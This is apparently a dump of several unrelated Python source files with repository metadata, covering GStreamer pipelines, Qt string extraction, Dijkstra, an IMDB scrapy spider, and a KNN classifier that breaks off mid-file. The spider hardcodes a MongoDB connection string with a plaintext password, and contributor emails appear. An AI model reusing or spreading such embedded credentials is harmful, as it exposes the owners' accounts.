# nvinfer -> nvvideoconvert -> nvosd -> video-renderer
print("Linking elements in the Pipeline \n")
source.link(caps_v4l2src)
caps_v4l2src.link(vidconvsrc)
vidconvsrc.link(nvvidconvsrc)
nvvidconvsrc.link(caps_vidconvsrc)
sinkpad = streammux.get_request_pad("sink_0")
if not sinkpad:
sys.stderr.write(" Unable to get the sink pad of streammux \n")
srcpad = caps_vidconvsrc.get_static_pad("src")
if not srcpad:
sys.stderr.write(" Unable to get source pad of caps_vidconvsrc \n")
srcpad.link(sinkpad)
streammux.link(pgie)
pgie.link(nvvidconv)
nvvidconv.link(nvosd)
if is_aarch64():
nvosd.link(transform)
transform.link(sink)
else:
nvosd.link(sink)
# create an event loop and feed gstreamer bus messages to it
loop = GObject.MainLoop()
bus = pipeline.get_bus()
bus.add_signal_watch()
bus.connect ("message", bus_call, loop)
# Let's add a probe to get informed of the metadata generated; we add the
# probe to the sink pad of the osd element, since by that time the buffer
# will have all the metadata.
osdsinkpad = nvosd.get_static_pad("sink")
if not osdsinkpad:
sys.stderr.write(" Unable to get sink pad of nvosd \n")
osdsinkpad.add_probe(Gst.PadProbeType.BUFFER, osd_sink_pad_buffer_probe, 0)
# start play back and listen to events
print("Starting pipeline \n")
pipeline.set_state(Gst.State.PLAYING)
try:
loop.run()
except:
pass
# cleanup
pipeline.set_state(Gst.State.NULL)
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
[
"foobar.warren@gmail.com"
] |
foobar.warren@gmail.com
|
d2bf098633aa22056182a33f65addd7a365598bb
|
97763df96bc21d91e46e3a98f9ee2b55f557035e
|
/share/qt/extract_strings_qt.py
|
f918851dc4a9feea1b425647bab2e4bb017feb84
|
[
"MIT"
] |
permissive
|
jaagcoin/JAAGCoin-Core
|
2f0138c38e28b98878bbcd5f011ab84d1441bb57
|
87073dbff406e2d95a6e9d81521973c3c8cef350
|
refs/heads/master
| 2020-03-26T05:34:39.790028
| 2018-08-30T15:46:16
| 2018-08-30T15:46:16
| 144,563,529
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,691
|
py
|
#!/usr/bin/env python
# Copyright (c) 2012-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Extract _("...") strings for translation and convert to Qt stringdefs so that
they can be picked up by Qt linguist.
'''
from __future__ import division,print_function,unicode_literals
from subprocess import Popen, PIPE
import operator
import os
import sys
OUT_CPP="qt/jaagstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
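# Editor's sketch (hypothetical snippet, not from a real xgettext run): given
# the two-line input
#   msgid "Hello"
#   msgstr ""
# parse_po returns [(['"Hello"'], ['""'])] - the quoted fragments are kept
# verbatim so they can be re-emitted into the generated C++ file below.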
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
if not XGETTEXT:
print('Cannot extract strings: xgettext utility is not installed or not configured.',file=sys.stderr)
print('Please install package "gettext" and re-run \'./configure\'.',file=sys.stderr)
exit(1)
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out.decode('utf-8'))
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings_qt.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *jaag_strings[] = {\n')
f.write('QT_TRANSLATE_NOOP("jaag-core", "%s"),\n' % (os.getenv('PACKAGE_NAME'),))
f.write('QT_TRANSLATE_NOOP("jaag-core", "%s"),\n' % (os.getenv('COPYRIGHT_HOLDERS'),))
if os.getenv('COPYRIGHT_HOLDERS_SUBSTITUTION') != os.getenv('PACKAGE_NAME'):
f.write('QT_TRANSLATE_NOOP("jaag-core", "%s"),\n' % (os.getenv('COPYRIGHT_HOLDERS_SUBSTITUTION'),))
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("jaag-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
|
[
"dmitriy@Dmitriys-iMac.local"
] |
dmitriy@Dmitriys-iMac.local
|
7825a87559141ba84ef6acaf295452b051a8cb7d
|
ff268c31f10cbd3e1c44261ca65a45c88ed3dae5
|
/Bayesian Networks/belief propagation/conf.py
|
2f40682278443925575581c90e1ac1cd016fc216
|
[
"MIT"
] |
permissive
|
gyani91/Machine-Learning
|
6642c65359ed48b212a0f4296f5ce908ed6e95e3
|
2fabaa6386d3be24e56aaa9a19d58cd19d225198
|
refs/heads/master
| 2023-05-27T10:25:55.222053
| 2023-05-15T18:12:45
| 2023-05-15T18:12:45
| 114,811,646
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 418
|
py
|
EDGE_COLOR = '#bbbbbb'
EDGE_WIDTH = 2
NODE_SIZE = 3000
NODE_BORDER_COLOR = EDGE_COLOR
NODE_BORDER_WIDTH = 3
NODE_COLOR_NORMAL = '#3492d9'
NODE_COLOR_SOURCE = '#2cb64e'
NODE_COLOR_OBSERVED = '#d96b34'
NODE_COLOR_REACHABLE = NODE_COLOR_SOURCE
NODE_SHAPE_SOURCE = 'd'
LABEL_COLOR = '#111111'
FACTOR_NODE_SIZE = 300
FACTOR_NODE_COLOR = '#fdae61'
FACTOR_NODE_SHAPE = 's'
AXIS_OBSERVED_BG_COLOR = '#d9c4ad'
|
[
"noreply@github.com"
] |
gyani91.noreply@github.com
|
21c1131b3a3c7b8405b92c8d65312c7524c3c66d
|
66809511847afd8a1469ba6600f3344b9e1fe3e7
|
/nanoauto/__init__.py
|
c00f05dbfec46a6dd41177a8f395f8b8d6ca3f38
|
[
"MIT"
] |
permissive
|
moshez/nanoauto
|
a621d2e3f8fde0feacd6a63ab8cf9a1471152a87
|
bad407ae4bfb465ba5d137f19e6291c7f8ffe36d
|
refs/heads/master
| 2016-09-05T22:09:23.810662
| 2015-03-23T03:27:12
| 2015-03-23T03:27:12
| 32,709,059
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 300
|
py
|
__version__ = '0.0.1-dev'
metadata = dict(
name='nanoauto',
version=__version__,
description='Web-based editor',
long_description="""\
nanoauto: write-only web editor
""",
author='Moshe Zadka',
author_email='zadka.moshe@gmail.com',
license='MIT',
copyright='2015',
)
|
[
"zadka.moshe@gmail.com"
] |
zadka.moshe@gmail.com
|
8d4bbe5ecb6a28987891b8d10b5ff34b924e3995
|
422d46ecde4b29ee2c34f1a2a30ba0417a33220f
|
/catkin_ws/build/turtlebot3/turtlebot3_bringup/catkin_generated/pkg.develspace.context.pc.py
|
0a2c7bbb047d769edc2577143f9b99f030a5fb20
|
[] |
no_license
|
biniamzerai/BusBot
|
68cf39f947a468b02b08ed1baad5afaf838a61e9
|
8522ba21d98f909ca29ddfd41b6047acc7f97691
|
refs/heads/master
| 2021-01-07T16:18:04.682683
| 2020-01-26T01:33:58
| 2020-01-26T01:33:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 438
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;std_msgs;sensor_msgs;diagnostic_msgs;turtlebot3_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "turtlebot3_bringup"
PROJECT_SPACE_DIR = "/home/jacob/catkin_ws/devel"
PROJECT_VERSION = "1.2.1"
|
[
"reed.jacobp@gmail.com"
] |
reed.jacobp@gmail.com
|
297a8141da9cd0e52e6b2557323f122bd7cd3bfb
|
a9493cf8607b0f55bbde902d99dd844be5d23057
|
/network analytics/HW1_dijkstra.py
|
3d2533ad1e71d006fd5d56022ff5c65dff877939
|
[] |
no_license
|
chanbaik/chanbaik
|
16fc52e19c97b0de6dbf140734b754296110d42a
|
84d8848ee0df16c8dfef0fffe9791629d7b7049b
|
refs/heads/master
| 2021-01-10T13:32:20.944586
| 2020-02-17T16:23:48
| 2020-02-17T16:23:48
| 51,171,594
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,358
|
py
|
# -*- coding: utf-8 -*-
# %% define the dijkstra function
def dijkstra(graph_dict, start, end):
"""
This is a recursive function that implements Dijkstra's Shortest Path
algorithm.
It takes as its inputs:
i. a graph represented by a "dictionary of dictionaries" structure,
generated using networkx;
ii. a starting node in that graph; and
iii. an ending node for that graph
It then performs the following steps:
i. initialises a set of distances from the start node as infinity;
ii. initialises a set of 'predecessors' to None (a predecessor is
defined for each node in the network and it lists the prior node
in the path from start to end);
iii. initialises the set of vertices for which the shortest path
from start to end has been found to empty; and then
iv. whilst there are still vertices left to assess:
a. restricts the set of vertices to those that still need
analysing;
b. finds the vertex that is the minimum distance from the start;
c. "relaxes" the neighbours of this closest vertex to see if the
shortest path to that vertex can be improved; and
d. updates the predecessor vertex for each node in the current path
When all vertices have been assessed, the function defines the path
and returns it with its associated cost
"""
distances = {} # empty dict for distances
predecessors = {} # list of vertices in path to current vertex
to_assess = graph_dict.keys() # get all the nodes in the graph that need to be assessed
# set all initial distances to infinity and no predecessor for any node
for node in graph_dict:
distances[node] = float('inf')
predecessors[node] = None
# set the initial collection of permanently labelled nodes to be empty
sp_set = []
# set the distance from the start node to be 0
distances[start] = 0
# as long as there are still nodes to assess:
while len(sp_set) < len(to_assess):
# chop out any nodes with a permanent label
still_in = { node: distances[node] for node in [node for node in to_assess if node not in sp_set] }
# find the not-yet-labelled node with the smallest tentative distance from the start
closest = min(still_in, key = distances.get)
# and add it to the set of permanently labelled nodes
sp_set.append(closest)
# then for all the neighbours of the closest node (that was just added)
# to the permanent set
for node in graph_dict[closest]:
# if a shorter path to that node can be found
if distances[node] > distances[closest] + graph_dict[closest][node]['weight']:
# update the distance with that shorter distance; and
distances[node] = distances[closest] + graph_dict[closest][node]['weight']
# set the predecessor for that node
predecessors[node] = closest
# once the loop is complete the final path needs to be calculated - this can
# be done by backtracing through the predecessors set
path = [end]
while start not in path:
path.append(predecessors[path[-1]])
# return the path in order start -> end, and its cost
return path[::-1], distances[end]
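# Editor's sanity check (toy data, not part of the assignment): on a weighted
# triangle the function should prefer the cheaper two-hop route:
#   toy = {1: {2: {'weight': 1}, 3: {'weight': 4}},
#          2: {1: {'weight': 1}, 3: {'weight': 2}},
#          3: {1: {'weight': 4}, 2: {'weight': 2}}}
#   dijkstra(toy, 1, 3) # -> ([1, 2, 3], 3)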
# %%
# function to get _all_ dijkstra shortest paths
def dijkstra_all(graph_dict):
ans = []
for start in graph_dict.keys():
for end in graph_dict.keys():
ans.append(dijkstra(graph_dict, start, end))
return ans
#%% read in data - use a pandas dataframe just for convenience
import pandas as pd
data = pd.read_table("../data/HW1_4.txt",
sep = " ",
header = None,
names = ['vx', 'vy', 'weight'])
# %% use network x to prepare dictionary structure which can be fed in to the
# dijkstra function
import networkx as nx
graph = nx.from_pandas_dataframe(data, 'vx', 'vy', 'weight')
# graph_nodes = graph.nodes()
graph_dict = nx.to_dict_of_dicts(graph)
# %% run the functions
path = dijkstra(graph_dict, 1, 6)
all_paths = dijkstra_all(graph_dict)
|
[
"chanbaik91@gmail.com"
] |
chanbaik91@gmail.com
|
0521e2806ded691379691042dc91f708f1d9dd77
|
fc9653df96016aeee35e1175e23b7765d0f1967a
|
/PYTHON COURSE/30 - chapter-3_exercise-1(WINNING_GAME).py
|
12500a372a53f8c4f276f6edb099396520b270cb
|
[] |
no_license
|
tushsoni/PYTHON-BEGINNERS-TO-ADVANCED
|
d8ec2967f80000a1f464993367f7744a69bb72b4
|
3bd92d588145887d95e82aab03a6480cf46f50f1
|
refs/heads/master
| 2020-06-13T05:13:31.037671
| 2019-07-04T06:47:31
| 2019-07-04T06:47:31
| 194,547,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
# *************************************** CHAPTER-3_EXERCISE-1 *************************************#\
# QUESTION : MAKE A VARIABLE LIKE winning_number and assign any number to it , ask user to guess a number , if user guessed correctly then print "YOU WIN !!!!"
# if user did'nt guessed correctly then :
# 1) if user guessed lower than actual number then print "too low"
# 2) if user guessed higher than actual number then print "too high"
# bonus : : : google "how to generate random number using python" to generate random number
#winning number
# ****************************************************** ANSWER ******************************************************* #
winning_number = 13
guessed_number = int(input("Enter a number between 1 to 20 : "))
if winning_number == guessed_number:
print("You win the game")
else: # It is called as NESTED IF-ELSE (it contain if in else that's why)
if guessed_number < winning_number:
print("too low")
if guessed_number > winning_number:
print("too high")
|
[
"noreply@github.com"
] |
tushsoni.noreply@github.com
|
90bc1ede2a61174bac6107a0fd68500f728a5cdf
|
e334315ab49ea26617377d023563d2555c7f74eb
|
/SourceCode/inputLayer/suite_inputLayer/tst_case2/test.py
|
065f3dbe39890f46b8f728052cdce6f42b12e757
|
[] |
no_license
|
asthagaur1/danfoss-bdd-automation
|
d331072992949a3ce372803a284f408ce0315422
|
714d81e1545f05d16e7c26e832c8b9b9fe6448cf
|
refs/heads/main
| 2023-03-30T15:29:54.849082
| 2021-04-05T08:21:04
| 2021-04-05T08:21:04
| 353,651,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
# -*- coding: utf-8 -*-
import names
def main():
startApplication("KoolProg")
mouseClick(waitForObject(names.koolProg_imgSetParams_Image))
mouseClick(waitForObjectItem(":SetParameters_List_3", "Danfoss.T4CClient.SetParameters+ListFileItems"))
|
[
"asthagaur@danfoss.com"
] |
asthagaur@danfoss.com
|
3b43001e103907111a747181d9a47c7ede00f321
|
7c14313ddb570ee6c10b67132f66676845350a85
|
/단계별로 풀어보기/부르트 포스/1436_영화감독 숌.py
|
908be86f8df27acbb51428545664bbc12688afb5
|
[] |
no_license
|
jongtix/Python_Baekjoon
|
864eebe6e959417d92c3b1ba3549afc33aa37045
|
89df7a46a6c6b09b01888f905d864d5b59af95b8
|
refs/heads/master
| 2023-01-02T18:39:07.871990
| 2020-10-19T08:34:38
| 2020-10-19T08:34:38
| 265,094,216
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,837
|
py
|
# Problem
# 666 is said to be a number that signifies the apocalypse, so many blockbuster movies use titles containing 666. The movie director Shom directs the series "The End of the World". When George Lucas made Star Wars, he named the films Star Wars 1, Star Wars 2, Star Wars 3, Star Wars 4, Star Wars 5 and Star Wars 6, and when Peter Jackson made The Lord of the Rings, he titled the films The Lord of the Rings 1, The Lord of the Rings 2 and The Lord of the Rings 3.
#
# But Shom decided to title his movies a little differently, to show that he surpasses George Lucas and Peter Jackson.
#
# An apocalypse number is a number that contains at least three consecutive 6s. The smallest apocalypse number is 666, and the next larger ones are 1666, 2666, 3666, ....
#
# So Shom will title his first movie "The End of the World 666" and his second movie "The End of the World 1666". Generalizing, the title of the Nth movie is "The End of the World (the Nth smallest apocalypse number)".
#
# Write a program that prints the number in the title of Shom's Nth movie. Shom always makes the series in order and makes no other movies.
#
# Input
# The first line contains the number N. N is a natural number less than or equal to 10,000.
#
# Output
# On the first line, print the number that appears in the title of the Nth movie.
#
# Sample input 1
# 2
# Sample output 1
# 1666
N = int(input())
result = list()
i = 1
stand = '666'
while len(result) < N:
if str(i).find(stand) > -1: result.append(i)
i += 1
print(result.pop())
|
[
"32856255+jongtix@users.noreply.github.com"
] |
32856255+jongtix@users.noreply.github.com
|
21562dbab964edf95aa8c7f35daa1e346636f62a
|
eb003b949ccd90d350eea8fc895f8b1ba9a99e40
|
/IMBD_SPIDER/IMBD_spider.py
|
1908cfd85a10a4e1b6f3c67f3f8dbe8749616aa6
|
[] |
no_license
|
AhmedFakhry47/ETL-Pipeline-For-IMDB_Movie_Reviews
|
59d952e3a7c5f8e815dcdd1152ad22dfd5ce4d59
|
5ca2327a8dc0f71f8a359860041d5b0e41bba421
|
refs/heads/master
| 2022-11-23T15:43:00.033629
| 2020-07-30T18:44:23
| 2020-07-30T18:44:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,881
|
py
|
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from pymongo import MongoClient
import pymongo
import scrapy
def connect_database():
cluster = MongoClient("mongodb+srv://enihcam:12345@cluster0.irbss.mongodb.net/<Movie_Review>?retryWrites=true&w=majority")
db = cluster["Movie_Review"]
collection = db["IMBD_Reviews"]
return collection
SEARCH_QUERY=(
'https://www.imdb.com/search/title?'
'title_type=feature&'
'user_rating=1.0,10.0&'
'countries=us&'
'languages=en&'
'count=250&'
'view=simple'
)
class IMBD_spider(scrapy.spiders.Spider):
name = 'IMBD_spider'
allowed_domains = ['imdb.com']
start_urls = [SEARCH_QUERY]
# NOTE: `rules` are only honoured by scrapy's CrawlSpider; on a plain
# scrapy.spiders.Spider this attribute is inert, and link-following is
# done manually in parse() below.
rules = (Rule(
LinkExtractor(restrict_css=('div.desc a')),
follow=True,
callback='parse',
),)
database = connect_database()
def parse(self,response):
links = response.css('span.lister-item-header a::attr(href)').extract()
#print('here',links)
for link in links:
yield response.follow(link,callback=self.parse_movie)
def parse_movie(self,response):
data = {}
data['title'] = response.css('h1::text').extract_first().strip()
#data['rating'] = response.css('.subtext::text').extract_first().strip() or None
data['year'] = response.css('#titleYear a::text').extract_first()
data['users_rating'] = response.xpath('//span[contains(@itemprop, "ratingValue")]/text()').extract_first()
data['votes'] = response.xpath('//span[contains(@itemprop, "ratingCount")]/text()').extract_first()
data['datascore'] = response.xpath('//div[contains(@class, "datacriticScore")]/span/text()').extract_first()
data['img_url'] = response.xpath('//div[contains(@class, "poster")]/a/img/@src').extract_first()
countries = response.xpath('//div[contains(@class, "txt-block") and contains(.//h4, "Country")]/a/text()').extract()
data['countries'] = [country.strip() for country in countries]
languages = response.xpath('//div[contains(@class, "txt-block") and contains(.//h4, "Language")]/a/text()').extract()
data['languages'] = [language.strip() for language in languages]
actors = response.xpath('//td[not(@class)]/a/text()').extract()
data['actors'] = [actor.strip() for actor in actors]
genres = response.xpath("//div[contains(.//h4, 'Genres')]/a/text()").extract()
data['genre'] = [genre.strip() for genre in genres]
tagline = response.xpath('//div[contains(string(), "Tagline")]/text()').extract()
data['tagline'] = ''.join(tagline).strip() or None
data['description'] = response.xpath('//div[contains(@class, "summary_text")]/text()').extract_first().strip() or None
directors = response.xpath("//div[contains(@class, 'credit_summary_item') and contains(.//h4, 'Director')]/a/text()").extract() or None
if directors: data['directors'] = [director.strip() for director in directors]
data['runtime'] = response.xpath("//div[contains(@class, 'txt-block') and contains(.//h4, 'Runtime')]/time/text()").extract_first() or None
data['imdb_url'] = response.url.replace('?ref_=adv_li_tt', '')
reviews_link = response.xpath("//div[contains(@class,'subnav')]/div[@id='quicklinksMainSection']/a[@class='quicklink'][3]/@href").extract()
yield response.follow(reviews_link[0],meta={'movie_info':data},callback=self.parse_reviews)
def parse_reviews(self,response):
data = response.meta['movie_info']
reviews = response.xpath("//div[@class='text show-more__control']/text()").extract()
stars = response.xpath("//span[@class='rating-other-user-rating']/span/text()").extract()[::2]
#Storing data in database
current_movie = {x:data[x] for x in data.keys()}
current_movie['_id']= current_movie['title']
current_movie['Reviews'] = {str(j):[i,v] for j,i,v in zip(list(range(0,len(stars))),reviews,stars)}
del(current_movie['title'])
self.database.insert_one(current_movie)
yield None
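# Editor's note (document shape inferred from the code above, not from a live
# run against MongoDB): each stored document looks roughly like
#   {"_id": <title>, "year": ..., "imdb_url": ...,
#    "Reviews": {"0": [<review text>, <star rating>], "1": [...], ...}}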
|
[
"ahmedfakhry805@gmail.com"
] |
ahmedfakhry805@gmail.com
|
72ee003a9e5c5ffb3c760e5114f3bf624734ed45
|
2c1143026cb6ed4e2d9093368eb3163768be0bd0
|
/examples/UnderDev/ECG_Entropy/test.py
|
30d046ad59f14996bf62c4ad1d332715fa6f0963
|
[
"Python-2.0",
"MIT"
] |
permissive
|
rhenanbartels/NeuroKit.py
|
4679f39e874f852509d11287e0e3936dd8baf702
|
1c95fd3f67f4157d6f1e13b10b9d08662ffecf05
|
refs/heads/master
| 2021-01-20T18:10:22.134512
| 2017-05-10T20:55:31
| 2017-05-10T20:55:31
| 90,910,551
| 0
| 0
| null | 2017-05-10T21:37:44
| 2017-05-10T21:37:43
| null |
UTF-8
|
Python
| false
| false
| 543
|
py
|
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import neurokit as nk
import nolds
df = pd.read_csv('data.csv')
df = nk.ecg_process(ecg=df["ECG"])
rri = df["ECG"]["RR_Intervals"]
signal=rri
tolerance = "default"
emb_dim=2
chaos = nk.complexity(signal, lyap_r=False, lyap_e=False)
#chaos = pd.Series(chaos)
#chaos.index = ["ECG_Complexity_" + s for s in chaos.index]
#processed_ecg["ECG"]["Complexity"] = chaos.to_dict()
#nolds.sampen(rri, 2, 0.1*np.std(rri), dist="euler")
#sample_entropy(rri,2, 0.1*np.std(rri))[1]
#
#
|
[
"dom.mak19@gmail.com"
] |
dom.mak19@gmail.com
|
19b9ec027d7d7e6b2f95e1ea3516fb29e6acdfbb
|
7f4b7bd69bf406703bd669acee58e789e937dec0
|
/classifier_models/q-1-1.py
|
f26f48734307675bf7f28921774a9deaeffbd45a
|
[] |
no_license
|
PrabhaPandey911/Machine-Learning
|
9c3767269fcb9c64f5cde8f4e629cf10f4caa7e2
|
fd7555fb90fb4f5e9b815a6d046ba0240f530841
|
refs/heads/main
| 2023-05-08T11:29:02.486864
| 2021-05-23T15:58:37
| 2021-05-23T15:58:37
| 370,025,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,443
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # q-1-1
#
# # Part (i):
# In[137]:
import numpy as np
import pandas as pd
import sys
import math
import matplotlib
import matplotlib.pyplot as plt
from pylab import *
filename1="./RobotDataset/Robot1"
filename2="./RobotDataset/Robot2"
# In[138]:
#As the given data does not have column names defined, hence giving them names accordingly, while reading the file
colnames=['class', 'a1', 'a2', 'a3','a4','a5','a6','Id']
robot1 = pd.read_csv(filename1, sep=' ', names=colnames,skipinitialspace=True)
robot2 =pd.read_csv(filename2,sep=' ',names=colnames,skipinitialspace=True)
# In[139]:
#To calculate the distance we need to bring down all the values of all the columns within the range of 0 and 1
#and hence normalize the data
#bringing down the values in the range(0,1)
def normalise(data):
result=data
for col in data.columns:
if col!='class'and col!='Id':
minimum=data[col].min()
maximum=data[col].max()
result[col]=((data[col])-minimum)/(maximum-minimum)
return result
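# Editor's note: this is standard min-max scaling, x' = (x - min) / (max - min).
# E.g. for a column spanning [2, 12], the value 7 maps to (7 - 2) / (12 - 2) = 0.5.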
#normalizing for robot1
robot1=normalise(robot1)
#normalizing for robot2
robot2=normalise(robot2)
# In[140]:
#for random spliting of data into training and validate
#for robot1
robot1 = robot1.sample(frac=1)
train1, validate1 = np.split(robot1, [int(.8*len(robot1))])
#for robot2
robot2=robot2.sample(frac=1)
train2,validate2 = np.split(robot2, [int(.8*len(robot2))])
# In[141]:
#for predicting in KNN, what we do is: for any given row, we calculate the distance to every row of the
#training data and then pick the k nearest neighbours
def predict(row,k,t,dis_func):
#t: train data set
#dis_func: distance function used
#k: k value provided
#row: point under consideration
#get the sorted list according to the function passed
#structure of the list: tuples of (distance, corresponding class label)
distance=dis_func(t,row)
#knn is a list of size 2: index 0 counts class label '0', index 1 counts class label '1'
knn=[0,0]
#take the first k distances and count how many times '0' and '1' appear as the class label
for i in range(0,k):
knn[distance[i][1]]+=1
#return the class label which occurred the most
if knn[1]>=knn[0]:
return 1
else:
return 0
# In[142]:
#calculate distance using euclidean formula
def euclidean(t,row):
distance=[]
columns=['a1','a2','a3','a4','a5','a6']
#t is the training data, to find the distance with all points, a row equals a point
#row is the given point with which distance is to be calculated
for index1,row1 in t.iterrows():
temp=0
#for one row, iterate over all the columns and sum up the square of difference (formula for euclidean)
for col in columns:
temp+=((row1[col]-row[col])**2)
#take square root of the above aggregate, this is the euclidean distance between current considered points
#save the distance and corresponding class of the training row under consideration, in a list "distance"
distance.append((math.sqrt(temp),row1['class']))
#sorting all the distances in increasing order
distance.sort()
#return the distance list
return distance
# In[143]:
#calculate distance using manhattan formula
def manhattan(t,row):
columns=['a1','a2','a3','a4','a5','a6']
distance=[]
#t is the training data, to find the distance with all points, a row equals a point
#row is the given point with which distance is to be calculated
for index1,row1 in t.iterrows():
temp=0
#for one row traverse over all the columns and sum up the absolute of corresponding differences
for col in columns:
temp+=abs(row1[col]-row[col])
#store the distance and corresponding class label value
distance.append((temp,row1['class']))
#sort the distances in increasing order
distance.sort()
#return the distance list
return distance
# In[144]:
#calculate distance using manhattan formula
def chebyshev(t,row):
columns=['a1','a2','a3','a4','a5','a6']
distance=[]
#t is the training data, to find the distance with all points, a row equals a point
#row is the given point with which distance is to be calculated
for index1,row1 in t.iterrows():
max_value=-sys.maxint-1
#for a row traverse all the columns and find out the max value of absolute of corresponding differences
for col in columns:
diff=abs(row1[col]-row[col])
max_value=max(diff,max_value)
#store the distance and corresponding class label value
distance.append((max_value,row1['class']))
#sort the distances in increasing order
distance.sort()
#return the distance list
return distance
# In[145]:
#calculate accuracy for training data t and a given function func
def calculate_accuracy(t,func,validate):
l=len(t)
l=int(math.sqrt(l))
l+=1
#for plotting graph
k_level=[]
accu_list=[]
max_acc=-sys.maxint-1
max_prec=0
max_recall=0
max_f1sc=0
final_k=0
#range of k is from 1 to square root of the number of rows of training data set provided
for i in range(1,l,2): #as k value should always be odd, therefore step size is equal to 2 (third arg)
#for confusion matrix
actual_value=[]
predicted_value=[]
tp=0
tn=0
fp=0
fn=0
#for each row in validate
for index,row in validate.iterrows():
x=predict(row,i,t,func)
if row['class']==1 and x==1:
tp+=1
if row['class']==0 and x==0:
tn+=1
if row['class']==1 and x==0:
fn+=1
if row['class']==0 and x==1:
fp+=1
#for confusion matrix
actual_value.append(row['class'])
predicted_value.append(x)
#for confusion matrix
actu = pd.Series(actual_value, name='Actual')
pred = pd.Series(predicted_value, name='Predicted')
df_confusion = pd.crosstab(actu, pred)
if tp+tn+fp+fn!=0:
acc_cm=float(tp+tn)/(tp+tn+fp+fn)#accuracy_cm(df_confusion)
else:
acc_cm=0
if tp+fn!=0:
recal_cm=float(tp)/(tp+fn)#recall_cm(df_confusion)
else:
recal_cm=0
if tp+fp!=0:
preci_cm=float(tp)/(tp+fp)#precision_cm(df_confusion)
else:
preci_cm=0
if recal_cm!=0 and preci_cm!=0:
f1_sc=(2/((1/recal_cm)+(1/preci_cm)))#f1Score_cm(preci_cm,recal_cm)
else:
f1_sc=0
#to plot the graph between different k values and its corresponding accuracy
k_level.append(i)
accu_list.append(acc_cm)
if max_acc<acc_cm:
max_acc=acc_cm
final_k=i
max_prec=preci_cm
max_recall=recal_cm
max_f1sc=f1_sc
return (k_level,accu_list,final_k,max_acc,max_prec,max_recall,max_f1sc)
# In[146]:
k1_list,accu1,k1,acc1,pre1,recal1,f1sc1=calculate_accuracy(train1,euclidean,validate1)
k2_list,accu2,k2,acc2,pre2,recal2,f1sc2=calculate_accuracy(train1,chebyshev,validate1)
k3_list,accu3,k3,acc3,pre3,recal3,f1sc3=calculate_accuracy(train1,manhattan,validate1)
k11_list,accu11,k11,acc11,pre11,recal11,f1sc11=calculate_accuracy(train2,euclidean,validate2)
k22_list,accu22,k22,acc22,pre22,recal22,f1sc22=calculate_accuracy(train2,chebyshev,validate2)
k33_list,accu33,k33,acc33,pre33,recal33,f1sc33=calculate_accuracy(train2,manhattan,validate2)
# # Part (ii): Iris
#
# In[147]:
irisfile="./Iris/Iris.csv"
colnames=['sepal_length', 'sepal_width', 'petal_length', 'petal_width','class']
data = pd.read_csv(irisfile, names=colnames,skipinitialspace=True)
#bringing down the values in the range(0,1)
def normalise_iris(data):
result=data
for col in data.columns:
if col!='class':
minimum=data[col].min()
maximum=data[col].max()
result[col]=((data[col])-minimum)/(maximum-minimum)
return result
data=normalise_iris(data)
# In[148]:
data = data.sample(frac=1)
train, validate = np.split(data, [int(.8*len(data))])
# In[149]:
def predict_iris(row,k,t,dis_func):
distance=dis_func(t,row)
knn={}
for i in range(0,k):
if distance[i][1] not in knn.keys():
knn[distance[i][1]]=1
else:
knn[distance[i][1]]+=1
maxi=0
label=''
for i in knn.keys():
if maxi<knn[i]:
maxi=knn[i]
label=i
return label
# In[150]:
def euclidean_iris(t,row):
distance=[]
columns=['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
for index1,row1 in t.iterrows():
temp=0
for col in columns:
temp+=((row1[col]-row[col])**2)
distance.append((math.sqrt(temp),row1['class']))#distance is list of distance and corresponding class label
distance.sort()#sorting all the distances in increasing order
return distance
# In[151]:
def manhattan_iris(t,row):
columns=['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
distance=[]
for index1,row1 in t.iterrows():
temp=0
for col in columns:
temp+=abs(row1[col]-row[col])
distance.append((temp,row1['class']))
distance.sort()
return distance
# In[152]:
